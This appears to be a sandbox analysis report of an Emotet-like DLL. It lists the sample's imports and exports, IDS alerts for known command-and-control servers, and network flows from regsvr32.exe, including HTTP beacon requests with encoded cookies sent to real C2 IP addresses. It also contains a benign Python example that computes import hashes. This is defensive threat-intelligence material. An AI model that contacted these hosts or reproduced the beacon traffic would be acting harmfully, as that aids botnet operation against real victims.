RT_CURSOR | 0xc4a68 | 0x134 | data | English | United States
RT_CURSOR | 0xc4bb8 | 0x134 | AmigaOS bitmap font | English | United States
RT_CURSOR | 0xc4d08 | 0x134 | data | English | United States
RT_CURSOR | 0xc4e58 | 0x134 | data | English | United States
RT_CURSOR | 0xc4fa8 | 0x134 | data | English | United States
RT_BITMAP | 0xc51e0 | 0xb8 | data | English | United States
RT_BITMAP | 0xc5298 | 0x144 | data | English | United States
RT_ICON | 0xa2ef8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676 | English | Australia
RT_ICON | 0xa31e0 | 0x128 | GLS_BINARY_LSB_FIRST | English | Australia
RT_DIALOG | 0xa2e40 | 0xb8 | data | English | United States
RT_DIALOG | 0xc50f8 | 0xe8 | data | English | United States
RT_STRING | 0xc53e0 | 0x82 | data | English | United States
RT_STRING | 0xc5468 | 0x2a | data | English | United States
RT_STRING | 0xc5498 | 0x192 | data | English | United States
RT_STRING | 0xc5630 | 0x4e2 | data | English | United States
RT_STRING | 0xc5ea8 | 0x31a | data | English | United States
RT_STRING | 0xc5bc8 | 0x2dc | data | English | United States
RT_STRING | 0xc6a08 | 0x8a | data | English | United States
RT_STRING | 0xc5b18 | 0xac | data | English | United States
RT_STRING | 0xc68f8 | 0xde | data | English | United States
RT_STRING | 0xc61c8 | 0x4c4 | data | English | United States
RT_STRING | 0xc6690 | 0x264 | data | English | United States
RT_STRING | 0xc69d8 | 0x2c | data | English | United States
RT_STRING | 0xc6a98 | 0x42 | data | English | United States
RT_GROUP_CURSOR | 0xc3c68 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | Australia
RT_GROUP_CURSOR | 0xc3e70 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
RT_GROUP_CURSOR | 0xc4660 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc3fd0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4510 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc43c0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4cf0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4270 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4900 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4120 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc47b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4a50 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4ba0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4e40 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc4f90 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc50e0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_ICON | 0xa3308 | 0x22 | data | English | Australia
DLL | Import
KERNEL32.dll | GetVolumeInformationA, GetFullPathNameA, CreateFileA, GetShortPathNameA, GetCPInfo, GetOEMCP, FileTimeToSystemTime, SystemTimeToFileTime, SetErrorMode, FileTimeToLocalFileTime, LocalFileTimeToFileTime, SetFileTime, SetFileAttributesA, GetFileAttributesA, GetFileTime, HeapFree, RtlUnwind, HeapAlloc, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetCommandLineA, TerminateProcess, ExitThread, CreateThread, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, FatalAppExitA, FindFirstFileA, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, UnhandledExceptionFilter, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, SetConsoleCtrlHandler, SetStdHandle, GetLocaleInfoW, SetEnvironmentVariableA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GlobalFlags, InterlockedDecrement, InterlockedIncrement, GetCurrentDirectoryA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, FreeResource, CreateEventA, SuspendThread, SetEvent, WaitForSingleObject, ResumeThread, SetThreadPriority, CloseHandle, GlobalAddAtomA, SetLastError, GlobalFree, CopyFileA, MulDiv, GlobalSize, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcatA, WinExec, lstrcpyA, GetWindowsDirectoryA, LoadLibraryA, FreeLibrary, LoadResource, LockResource, SizeofResource, FindResourceA, ExitProcess, GetLastError, lstrlenA, lstrcmpiA, lstrcmpiW, GetStringTypeExA, GetStringTypeExW, lstrlenW, WideCharToMultiByte, CompareStringA, CompareStringW, GetEnvironmentVariableA, MultiByteToWideChar, GetEnvironmentVariableW, GetVersion, GetThreadLocale, GetLocaleInfoA, GetACP, GetVersionExA, IsBadWritePtr, InterlockedExchange
USER32.dll | GetSysColorBrush, DestroyIcon, GetDialogBaseUnits, GetMenuItemInfoA, DestroyMenu, FillRect, wsprintfA, ScrollWindowEx, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, IsDlgButtonChecked, SetDlgItemTextA, SetDlgItemInt, GetDlgItemTextA, GetDlgItemInt, CheckRadioButton, CheckDlgButton, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, ScrollWindow, TrackPopupMenuEx, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, UpdateWindow, DeleteMenu, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetScrollInfo, GetClassInfoA, RegisterClassA, UnregisterClassA, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, CopyRect, GetWindow, GetDesktopWindow, SetActiveWindow, GetSystemMetrics, CreateDialogIndirectParamA, DestroyWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CharLowerW, CharLowerA, CharUpperW, CharUpperA, EnableWindow, GetSysColor, SendMessageA, MessageBeep, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, DispatchMessageA, GetActiveWindow, IsWindowVisible, GetKeyState, PeekMessageA, GetCursorPos, WindowFromPoint, EndPaint, BeginPaint, GetWindowDC, ValidateRect, MessageBoxA, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, GetMenu, TabbedTextOutA, SetCapture, RedrawWindow, ReleaseCapture, PtInRect, GetClientRect, SetCursor, SetWindowLongA, IsWindow, InvalidateRect, InflateRect, ReleaseDC, GetDC, GetParent, GetWindowRect, CopyIcon, LoadCursorA, PostQuitMessage, PostMessageA, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, ShowOwnedPopups, GetMenuState, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, SetScrollInfo
GDI32.dll | GetCurrentPositionEx, ArcTo, PolyDraw, PolylineTo, PolyBezierTo, ExtSelectClipRgn, DeleteDC, CreateDIBPatternBrushPt, CreatePatternBrush, CreateCompatibleDC, SelectPalette, PlayMetaFileRecord, GetObjectType, StartDocA, PlayMetaFile, CreatePen, ExtCreatePen, CreateSolidBrush, CreateHatchBrush, GetTextMetricsA, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, DPtoLP, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, EnumMetaFile, GetStockObject, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, SelectClipPath, CreateRectRgn, GetClipRgn, SelectClipRgn, DeleteObject, SetColorAdjustment, SetArcDirection, SetMapperFlags, SetTextCharacterExtra, SetTextJustification, SetTextAlign, MoveToEx, LineTo, OffsetClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, SaveDC, SetBkColor, SetTextColor, GetClipBox, GetDCOrgEx, CreateBitmap, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetTextExtentPoint32A, GetObjectA, CreateFontIndirectA, PtVisible
comdlg32.dll | GetOpenFileNameA, GetSaveFileNameA, GetFileTitleA
WINSPOOL.DRV | OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll | RegDeleteKeyA, RegCreateKeyA, RegDeleteValueA, RegSetValueExA, RegCreateKeyExA, RegEnumKeyA, RegCloseKey, RegOpenKeyA, RegSetValueA, RegQueryValueExA, RegOpenKeyExA, RegQueryValueA
SHELL32.dll | ExtractIconA, SHGetFileInfoA, ShellExecuteA
COMCTL32.dll | (no named imports listed)
SHLWAPI.dll | PathFindExtensionA, PathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathIsUNCA
ole32.dll | CoTreatAsClass, StringFromCLSID, ReadClassStg, ReadFmtUserTypeStg, CreateBindCtx, WriteClassStg, WriteFmtUserTypeStg, SetConvertStg, CoTaskMemFree, CoTaskMemAlloc, ReleaseStgMedium, OleDuplicateData, CoDisconnectObject, CoCreateInstance, StringFromGUID2, CLSIDFromString, OleRegGetUserType
OLEAUT32.dll | VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString, SysStringLen, SysAllocStringByteLen, SysStringByteLen, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, SafeArrayRedim, VariantCopy, SafeArrayAllocData, SafeArrayAllocDescriptor, SafeArrayCopy, SafeArrayGetElement, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayLock, SafeArrayUnlock, SafeArrayDestroy, SafeArrayDestroyData, SafeArrayDestroyDescriptor, VariantTimeToSystemTime, SystemTimeToVariantTime, SysAllocString, SysReAllocStringLen, VarDateFromStr, VarBstrFromDec, VarDecFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate
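The Import Hash reported in the header (70b8cfa68ef2c7898ee65b9a0ce218ac) is derived from exactly this import table, and it is the value to pivot on when hunting for other builds of the same loader. The block below is an added example, not part of the Joe Sandbox report, of how that hash is computed: every import is normalised to "dll.function" (DLL name lowercased, a .dll/.ocx/.sys extension dropped, ordinal imports written as ordN), the strings are joined with commas in table order, and the result is MD5-hashed. It is run over a constructed subset of the DLLs listed above, with an invented ordinal for COMCTL32 (the report does not list it), so it does not reproduce the sample's hash; pefile's extra table that maps well-known ordinals of a few DLLs back to names is also omitted.

```python
import hashlib

# Constructed import table for illustration: a subset of the DLLs and
# functions from the report's import table, plus an assumed ordinal import
# for COMCTL32 that the report does not show.
SAMPLE_IMPORTS = [
    ("KERNEL32.dll", ["GetVolumeInformationA", "GetFullPathNameA", "CreateFileA"]),
    ("USER32.dll", ["GetSysColorBrush", "DestroyIcon"]),
    ("COMCTL32.dll", [17]),  # hypothetical ordinal-only import
    ("ADVAPI32.dll", ["RegDeleteKeyA", "RegCreateKeyA"]),
]

# Extensions that the import-hash convention strips from the DLL name.
STRIPPED_EXTENSIONS = ("dll", "ocx", "sys")


def imphash_string(imports):
    """Canonical comma-separated 'dll.function' list, in import-table order.
    Order matters: a rebuilt binary with the same imports in a different order
    gets a different hash, which is why linkers' ordering makes imphash a
    useful build fingerprint."""
    parts = []
    for dll, funcs in imports:
        name = dll.lower()
        base, dot, ext = name.rpartition(".")
        if dot and ext in STRIPPED_EXTENSIONS:
            name = base
        for func in funcs:
            func_name = f"ord{func}" if isinstance(func, int) else func
            parts.append(f"{name}.{func_name}".lower())
    return ",".join(parts)


def imphash(imports):
    """MD5 of the canonical import string, as a lowercase hex digest."""
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


if __name__ == "__main__":
    print(imphash_string(SAMPLE_IMPORTS))
    print(imphash(SAMPLE_IMPORTS))
```

When a sample's import hash matches a known family build, check the import ordering as well as the set of functions; two samples that import the same APIs but were linked with a different toolchain will not collide.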
Name | Ordinal | Address
DllRegisterServer | 1 | 0x10001186
DllUnregisterServer | 2 | 0x10001195
Language of compilation system | Country where language is spoken
English | Australia
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/20/22-00:21:19.660167 | TCP | 2404334 | ET CNC Feodo Tracker Reported CnC Server TCP group 18 | 49863 | 443 | 192.168.2.4 | 46.55.222.11
07/20/22-00:22:59.973972 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49872 | 80 | 192.168.2.4 | 131.100.24.231
07/20/22-00:19:39.513193 | TCP | 2404338 | ET CNC Feodo Tracker Reported CnC Server TCP group 20 | 49760 | 8080 | 192.168.2.4 | 51.91.76.89
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2022 00:19:39.513192892 CEST | 49760 | 8080 | 192.168.2.4 | 51.91.76.89
Jul 20, 2022 00:19:39.536540985 CEST | 8080 | 49760 | 51.91.76.89 | 192.168.2.4
Jul 20, 2022 00:19:40.105530977 CEST | 49760 | 8080 | 192.168.2.4 | 51.91.76.89
Jul 20, 2022 00:19:40.126441002 CEST | 8080 | 49760 | 51.91.76.89 | 192.168.2.4
Jul 20, 2022 00:19:40.808762074 CEST | 49760 | 8080 | 192.168.2.4 | 51.91.76.89
Jul 20, 2022 00:19:40.830540895 CEST | 8080 | 49760 | 51.91.76.89 | 192.168.2.4
Jul 20, 2022 00:19:40.843548059 CEST | 49761 | 8080 | 192.168.2.4 | 173.254.208.91
Jul 20, 2022 00:19:41.007450104 CEST | 8080 | 49761 | 173.254.208.91 | 192.168.2.4
Jul 20, 2022 00:19:41.605851889 CEST | 49761 | 8080 | 192.168.2.4 | 173.254.208.91
Jul 20, 2022 00:19:41.772378922 CEST | 8080 | 49761 | 173.254.208.91 | 192.168.2.4
Jul 20, 2022 00:19:42.308891058 CEST | 49761 | 8080 | 192.168.2.4 | 173.254.208.91
Jul 20, 2022 00:19:42.473402977 CEST | 8080 | 49761 | 173.254.208.91 | 192.168.2.4
Jul 20, 2022 00:19:42.518814087 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:42.518877029 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:19:42.518975973 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:42.537899017 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:42.537946939 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:19:42.882864952 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:19:42.883017063 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:43.327409983 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:43.327465057 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:19:43.328063965 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:19:43.328210115 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:43.332410097 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:19:43.372520924 CEST | 443 | 49762 | 149.56.128.192 | 192.168.2.4
Jul 20, 2022 00:20:15.830521107 CEST | 49762 | 443 | 192.168.2.4 | 149.56.128.192
Jul 20, 2022 00:20:16.089051008 CEST | 49777 | 80 | 192.168.2.4 | 120.50.40.183
Jul 20, 2022 00:20:19.124555111 CEST | 49777 | 80 | 192.168.2.4 | 120.50.40.183
Jul 20, 2022 00:20:25.125055075 CEST | 49777 | 80 | 192.168.2.4 | 120.50.40.183
Jul 20, 2022 00:20:37.392364979 CEST | 49829 | 8080 | 192.168.2.4 | 160.16.218.63
Jul 20, 2022 00:20:40.407690048 CEST | 49829 | 8080 | 192.168.2.4 | 160.16.218.63
Jul 20, 2022 00:20:46.580015898 CEST | 49829 | 8080 | 192.168.2.4 | 160.16.218.63
Jul 20, 2022 00:20:58.602675915 CEST | 49858 | 8080 | 192.168.2.4 | 206.188.212.92
Jul 20, 2022 00:21:01.596966028 CEST | 49858 | 8080 | 192.168.2.4 | 206.188.212.92
Jul 20, 2022 00:21:07.597471952 CEST | 49858 | 8080 | 192.168.2.4 | 206.188.212.92
Jul 20, 2022 00:21:19.660166979 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.660232067 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:19.660329103 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.665569067 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.665601969 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:19.838284969 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:19.838403940 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.846988916 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.847004890 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:19.847331047 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:19.847402096 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.848023891 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
Jul 20, 2022 00:21:19.888503075 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:20.018318892 CEST | 443 | 49863 | 46.55.222.11 | 192.168.2.4
Jul 20, 2022 00:21:20.018424034 CEST | 49863 | 443 | 192.168.2.4 | 46.55.222.11
                                                                        Jul 20, 2022 00:21:20.018439054 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.018518925 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056128025 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056163073 CEST4434986346.55.222.11192.168.2.4
                                                                        Jul 20, 2022 00:21:20.056169987 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.056225061 CEST49863443192.168.2.446.55.222.11
                                                                        Jul 20, 2022 00:21:20.097831011 CEST498648080192.168.2.479.172.212.216
                                                                        Jul 20, 2022 00:21:20.130996943 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:20.708050966 CEST498648080192.168.2.479.172.212.216
                                                                        Jul 20, 2022 00:21:20.740828991 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:21.395634890 CEST498648080192.168.2.479.172.212.216
                                                                        Jul 20, 2022 00:21:21.428340912 CEST80804986479.172.212.216192.168.2.4
                                                                        Jul 20, 2022 00:21:21.448085070 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:21.662029982 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:22.176954031 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:22.389219999 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:22.895668983 CEST498658080192.168.2.4103.221.221.247
                                                                        Jul 20, 2022 00:21:23.110194921 CEST808049865103.221.221.247192.168.2.4
                                                                        Jul 20, 2022 00:21:23.172842026 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:26.177191973 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:32.181190014 CEST4986680192.168.2.458.227.42.236
                                                                        Jul 20, 2022 00:21:44.213305950 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.213351965 CEST44349867192.99.251.50192.168.2.4
                                                                        Jul 20, 2022 00:21:44.213468075 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.214363098 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:21:44.214389086 CEST44349867192.99.251.50192.168.2.4
                                                                        Jul 20, 2022 00:22:16.586654902 CEST49867443192.168.2.4192.99.251.50
                                                                        Jul 20, 2022 00:22:16.806329012 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:19.811513901 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:25.827936888 CEST498688080192.168.2.4185.157.82.211
                                                                        Jul 20, 2022 00:22:37.858102083 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:40.860141993 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:46.860671997 CEST498698080192.168.2.4159.8.59.82
                                                                        Jul 20, 2022 00:22:58.878169060 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:58.908149004 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.408660889 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:59.436666965 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.940119982 CEST498708080192.168.2.451.91.7.5
                                                                        Jul 20, 2022 00:22:59.968211889 CEST80804987051.91.7.5192.168.2.4
                                                                        Jul 20, 2022 00:22:59.973972082 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.113894939 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.114065886 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.192707062 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:00.331798077 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350327015 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350377083 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:00.350548029 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:04.484003067 CEST4987280192.168.2.4131.100.24.231
                                                                        Jul 20, 2022 00:23:04.624656916 CEST8049872131.100.24.231192.168.2.4
                                                                        Jul 20, 2022 00:23:04.624757051 CEST4987280192.168.2.4131.100.24.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2022 00:22:43.090192080 CEST | 61497 | 53 | 192.168.2.4 | 8.8.8.8
Jul 20, 2022 00:22:44.660972118 CEST | 57890 | 53 | 192.168.2.4 | 8.8.8.8

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jul 20, 2022 00:20:16.266737938 CEST | 120.50.40.183 | 192.168.2.4 | 60b2 | (Unknown) | Destination Unreachable
Jul 20, 2022 00:20:19.302870035 CEST | 120.50.40.183 | 192.168.2.4 | 60b2 | (Unknown) | Destination Unreachable
Jul 20, 2022 00:20:25.305701017 CEST | 120.50.40.183 | 192.168.2.4 | 60b2 | (Unknown) | Destination Unreachable

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 20, 2022 00:22:43.090192080 CEST | 192.168.2.4 | 8.8.8.8 | 0x884c | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001)
Jul 20, 2022 00:22:44.660972118 CEST | 192.168.2.4 | 8.8.8.8 | 0x1858 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 20, 2022 00:22:43.113759995 CEST | 8.8.8.8 | 192.168.2.4 | 0x884c | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
Jul 20, 2022 00:22:44.683568954 CEST | 8.8.8.8 | 192.168.2.4 | 0x1858 | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001)
                                                                        • 149.56.128.192
                                                                        • 46.55.222.11
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49762 | 149.56.128.192 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-07-19 22:19:43 UTC | 0 | OUT | GET /SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX HTTP/1.1
Cookie: wd=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI+fnIMfAI5oXYW5JqiwY3vIUlQBUwfTw48YkmxLCfsNjgx6F20LQV3Hnux9vPTgtjjTh1sYYnbNkqrHAkwHKUzWJuie4H3uJ+0/v2jViJz29FfNeDiPeJZqmSc76S+b
Host: 149.56.128.192
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49863 | 46.55.222.11 | 443 | C:\Windows\SysWOW64\regsvr32.exe
Timestamp | kBytes transferred | Direction | Data
2022-07-19 22:21:19 UTC | 0 | OUT | GET /TBwKHjQjVeCWIQFS HTTP/1.1
Cookie: TzD=CeWC3bvXPYw6ceEYgfvGdLYPTo0VXwyjQM1b37/spkNB3CGw86NzMzKf1AUGnAmmtW/OWNjKbUC9gyl1OQsrdyfP5xbn01or99X72cgyaEexWqMXtNXm3BOHAyBwYk6TnEAF0q3TMdibHcQhcNNo6Sm9GxBDPs+KnKkOdOQZ76tbXnfftFwj68x6LE4gFCEnmcMMTNEuYiAXbOCL+S+FsI9Ih3e+pR2YRWgAeau9SKu/amPhx+vBX8EeVceLhJI1Cl5c/CGgAhr7yQ63yo30L73FGkUea/TvEpxNO3PjqOskzZcORWqX5SDpz1exfeePjzjvPRMWMpzyGCnmStacLsD4YfqerzQ/buYpgMei8ILwW16H6ENPPQ==
Host: 46.55.222.11
Connection: Keep-Alive
Cache-Control: no-cache
2022-07-19 22:21:20 UTC | 0 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 19 Jul 2022 22:21:19 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
2022-07-19 22:21:20 UTC | 1 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
